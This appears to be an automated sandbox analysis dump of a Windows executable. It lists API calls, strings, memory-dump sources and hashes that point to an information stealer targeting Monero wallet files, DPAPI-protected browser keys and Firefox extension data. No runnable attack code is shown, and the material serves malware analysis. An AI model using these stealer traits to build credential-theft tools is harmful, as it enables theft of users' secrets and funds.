                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                    • Part of subcall function 00718CF0: GetSystemTime.KERNEL32(00720E1B,011DA4D8,007205B6,?,?,007013F9,?,0000001A,00720E1B,00000000,?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 00718D16
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0070AA11
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 0070AB2F
                                  • lstrlen.KERNEL32(00000000), ref: 0070ADEC
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                  • DeleteFileA.KERNEL32(00000000), ref: 0070AE73
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 7609c98c76ec182a810d8a9e63a60cc9e97583bcc6e5cdeb97ac8f4d1f0e22b7
                                  • Instruction ID: f5156d0ac51e1ce8d13501e4ac503e1432c2326444402dea5cf62a1c67184385
                                  • Opcode Fuzzy Hash: 7609c98c76ec182a810d8a9e63a60cc9e97583bcc6e5cdeb97ac8f4d1f0e22b7
                                  • Instruction Fuzzy Hash: 16E106B2915118EBCB14FBA8EC66EEE7339AF14310F408559F116720D1EF386A88CB75
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                    • Part of subcall function 00718CF0: GetSystemTime.KERNEL32(00720E1B,011DA4D8,007205B6,?,?,007013F9,?,0000001A,00720E1B,00000000,?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 00718D16
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0070D581
                                  • lstrlen.KERNEL32(00000000), ref: 0070D798
                                  • lstrlen.KERNEL32(00000000), ref: 0070D7AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 0070D82B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: c71be04ea74408abc343cf2312c4eba64e6fa2e0317d78dbfa18dd942ebbdede
                                  • Instruction ID: 792e1a10da7d764e5b0ecd067abf7d8bd998852369e08e8bb07983de873ac32d
                                  • Opcode Fuzzy Hash: c71be04ea74408abc343cf2312c4eba64e6fa2e0317d78dbfa18dd942ebbdede
                                  • Instruction Fuzzy Hash: CF912772A55118EBCB14FBA8EC6ADEE7339AF14310F404559F116720D1EF386A88CB72
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                    • Part of subcall function 00718CF0: GetSystemTime.KERNEL32(00720E1B,011DA4D8,007205B6,?,?,007013F9,?,0000001A,00720E1B,00000000,?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 00718D16
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0070D901
                                  • lstrlen.KERNEL32(00000000), ref: 0070DA9F
                                  • lstrlen.KERNEL32(00000000), ref: 0070DAB3
                                  • DeleteFileA.KERNEL32(00000000), ref: 0070DB32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: a36b151030793ef18916d074fd181d32db700cca3cf2f2e70172fdbe77fe1702
                                  • Instruction ID: 4d89add200bae3ee51c23657d6d5f595c35385fb62db296f2f0e4b1da76659d2
                                  • Opcode Fuzzy Hash: a36b151030793ef18916d074fd181d32db700cca3cf2f2e70172fdbe77fe1702
                                  • Instruction Fuzzy Hash: 508105B2A55114EBCB14FBE8EC6ADEE7339AF14310F404559F116660D1EF386A88CB72
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AdjustPointer
                                  • String ID:
                                  • API String ID: 1740715915-0
                                  • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                  • Instruction ID: efecfe964102cedfad5a989fefd31541a0ff372d92b5fe105858a52599277622
                                  • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                  • Instruction Fuzzy Hash: 5C51BE72600206EFEF39AF54CA45BBA77A4FF01350F24853DE90986691EB39ED44DB90
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 0070A664
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocLocallstrcpy
                                  • String ID: @$v10$v20
                                  • API String ID: 2746078483-278772428
                                  • Opcode ID: 6b505f17501b2a4e70cd4603aeb1e3ece9d1f10e9fb18cbe1ec210c52e587220
                                  • Instruction ID: 491165f3fcc367877ad4d325e24d3f3de001f5413b081e2ce1402396e8a25119
                                  • Opcode Fuzzy Hash: 6b505f17501b2a4e70cd4603aeb1e3ece9d1f10e9fb18cbe1ec210c52e587220
                                  • Instruction Fuzzy Hash: 1A514C70A50208EFDB24DFA8DDAAFED77B6AF54300F408118F90A5B1D1EB786A45CB51
                                  APIs
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                    • Part of subcall function 0070A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0070A13C
                                    • Part of subcall function 0070A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0070A161
                                    • Part of subcall function 0070A110: LocalAlloc.KERNEL32(00000040,?), ref: 0070A181
                                    • Part of subcall function 0070A110: ReadFile.KERNEL32(000000FF,?,00000000,0070148F,00000000), ref: 0070A1AA
                                    • Part of subcall function 0070A110: LocalFree.KERNEL32(0070148F), ref: 0070A1E0
                                    • Part of subcall function 0070A110: CloseHandle.KERNEL32(000000FF), ref: 0070A1EA
                                    • Part of subcall function 00718FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00718FE2
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00721678,00720D93), ref: 0070F64C
                                  • lstrlen.KERNEL32(00000000), ref: 0070F66B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  • Opcode ID: b38166e220be0e237e60d1a123d44eada434307d3182fc3b2f84076d998eed81
                                  • Instruction ID: 3c5e1cc9c1a9e3f7aa7feb107cbec56feef6bb767a06c18a8315f22664aeeb4e
                                  • Opcode Fuzzy Hash: b38166e220be0e237e60d1a123d44eada434307d3182fc3b2f84076d998eed81
                                  • Instruction Fuzzy Hash: 895104B1E11108EBCB14FBA8ED5ADED7379AF54310F408568F416671D1EE386B48CB62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: 6988fb1080872caed33d40db1ae4362969ca64f8f2f3a59e2c712062d251ac5a
                                  • Instruction ID: 56061c686c09649bbce9ea1e0f2a36e5d98e19babda1432575ad1e383598a080
                                  • Opcode Fuzzy Hash: 6988fb1080872caed33d40db1ae4362969ca64f8f2f3a59e2c712062d251ac5a
                                  • Instruction Fuzzy Hash: FA4160B1E15109EFCF04EFA8D955AEEB778AF44314F008018F516762D1EB78AA84CFA1
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0070A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0070A13C
                                    • Part of subcall function 0070A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0070A161
                                    • Part of subcall function 0070A110: LocalAlloc.KERNEL32(00000040,?), ref: 0070A181
                                    • Part of subcall function 0070A110: ReadFile.KERNEL32(000000FF,?,00000000,0070148F,00000000), ref: 0070A1AA
                                    • Part of subcall function 0070A110: LocalFree.KERNEL32(0070148F), ref: 0070A1E0
                                    • Part of subcall function 0070A110: CloseHandle.KERNEL32(000000FF), ref: 0070A1EA
                                    • Part of subcall function 00718FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00718FE2
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0070A489
                                    • Part of subcall function 0070A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Op,00000000,00000000), ref: 0070A23F
                                    • Part of subcall function 0070A210: LocalAlloc.KERNEL32(00000040,?,?,?,00704F3E,00000000,?), ref: 0070A251
                                    • Part of subcall function 0070A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Op,00000000,00000000), ref: 0070A27A
                                    • Part of subcall function 0070A210: LocalFree.KERNEL32(?,?,?,?,00704F3E,00000000,?), ref: 0070A28F
                                    • Part of subcall function 0070A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0070A2D4
                                    • Part of subcall function 0070A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0070A2F3
                                    • Part of subcall function 0070A2B0: LocalFree.KERNEL32(?), ref: 0070A323
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2100535398-738592651
                                  • Opcode ID: 40a68d05c377889b61852e4f54d6cf6d1ea35e8d5d29e69d4d8962b22f13aafb
                                  • Instruction ID: e08133967ce863b8c9c559c84c023e770a87e2f7a1ef8d111741f0da4fe62138
                                  • Opcode Fuzzy Hash: 40a68d05c377889b61852e4f54d6cf6d1ea35e8d5d29e69d4d8962b22f13aafb
                                  • Instruction Fuzzy Hash: 573143B6D10209EBCF14DBE4DC45AEFB7B8BF58300F444618E901A7281E7389A55CB62
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,007205BF), ref: 0071885A
                                  • Process32First.KERNEL32(?,00000128), ref: 0071886E
                                  • Process32Next.KERNEL32(?,00000128), ref: 00718883
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                  • CloseHandle.KERNEL32(?), ref: 007188F1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: 88e43f6c480a6ba893fc4624d7b35c175ee14427a6e299c079aad85ba8693755
                                  • Instruction ID: ff0397ef0d6896e0640722dfd32ba70dd3930154d4ff4340741afd65fecb9a1f
                                  • Opcode Fuzzy Hash: 88e43f6c480a6ba893fc4624d7b35c175ee14427a6e299c079aad85ba8693755
                                  • Instruction Fuzzy Hash: EA315EB1956258EBCB24DF98DC55FEEB378EB05710F104199F10AA21D0DB386B84CFA1
                                  APIs
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0077FE13
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0077FE2C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Value___vcrt_
                                  • String ID:
                                  • API String ID: 1426506684-0
                                  • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                  • Instruction ID: 63f8d36849475f040df69eb7b4cf1e7651f0120d9866542ad6ad1af351154987
                                  • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                  • Instruction Fuzzy Hash: 63018432649721EEFE3427746DC9A6B3698EB017F57348339F22A851F2EF994C429250
                                  APIs
                                  • __getptd.LIBCMT ref: 0071CA7E
                                    • Part of subcall function 0071C2A0: __amsg_exit.LIBCMT ref: 0071C2B0
                                  • __getptd.LIBCMT ref: 0071CA95
                                  • __amsg_exit.LIBCMT ref: 0071CAA3
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0071CAC7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: 87aaa2411feda0a80b3ebc94571a361ae75b15ba15779029081816f53e11081a
                                  • Instruction ID: a0a01f6fe60cc3d97123277ff50473c4bad04e83b0407fe61399ba354df9d5e4
                                  • Opcode Fuzzy Hash: 87aaa2411feda0a80b3ebc94571a361ae75b15ba15779029081816f53e11081a
                                  • Instruction Fuzzy Hash: 6AF03032984618DBD723FBEC980B7DE33A0AF44B20F15814AF505A61D2DB7C99C19AD6
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Catch
                                  • String ID: MOC$RCC
                                  • API String ID: 78271584-2084237596
                                  • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                  • Instruction ID: fbf9343a4ff95c6c9f3ac0844fe04b2a2a88eaf80755ff549c076a51a256f0dd
                                  • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                  • Instruction Fuzzy Hash: EF415B71940209EFCF15EF94DD81EAE7BB5BF48304F158059F90466211D3399A60DFA0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: T8x
                                  • API String ID: 0-3719633547
                                  • Opcode ID: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                                  • Instruction ID: 9882366358d0ec0e9f890776ee305aeac71d924365118d07f2fd0518f9b72cd2
                                  • Opcode Fuzzy Hash: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                                  • Instruction Fuzzy Hash: 2F21C3F1680205FFEB10BF79CCC486AB7A9BF007657104619F925C7151E779EE0087A0
                                  APIs
                                    • Part of subcall function 00718F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00718F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 007151CA
                                  • lstrcat.KERNEL32(?,00721058), ref: 007151E7
                                  • lstrcat.KERNEL32(?,011D90E0), ref: 007151FB
                                  • lstrcat.KERNEL32(?,0072105C), ref: 0071520D
                                    • Part of subcall function 00714B60: wsprintfA.USER32 ref: 00714B7C
                                    • Part of subcall function 00714B60: FindFirstFileA.KERNEL32(?,?), ref: 00714B93
                                    • Part of subcall function 00714B60: StrCmpCA.SHLWAPI(?,00720FC4), ref: 00714BC1
                                    • Part of subcall function 00714B60: StrCmpCA.SHLWAPI(?,00720FC8), ref: 00714BD7
                                    • Part of subcall function 00714B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00714DCD
                                    • Part of subcall function 00714B60: FindClose.KERNEL32(000000FF), ref: 00714DE2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: 4c0b1f8f689cae180a48fb92fe8bf086eb9f014df49f4d657dd15bf39cc5cd0e
                                  • Instruction ID: e91ac4cc4f4af648edc4cfcf5aa159de030fc4eaf986b3804c0de2ee4e8a7f97
                                  • Opcode Fuzzy Hash: 4c0b1f8f689cae180a48fb92fe8bf086eb9f014df49f4d657dd15bf39cc5cd0e
                                  • Instruction Fuzzy Hash: DF2148FA948208F7CB24EBB4EC46EED333CAB94300F404545B655560C1EE789AC88BA1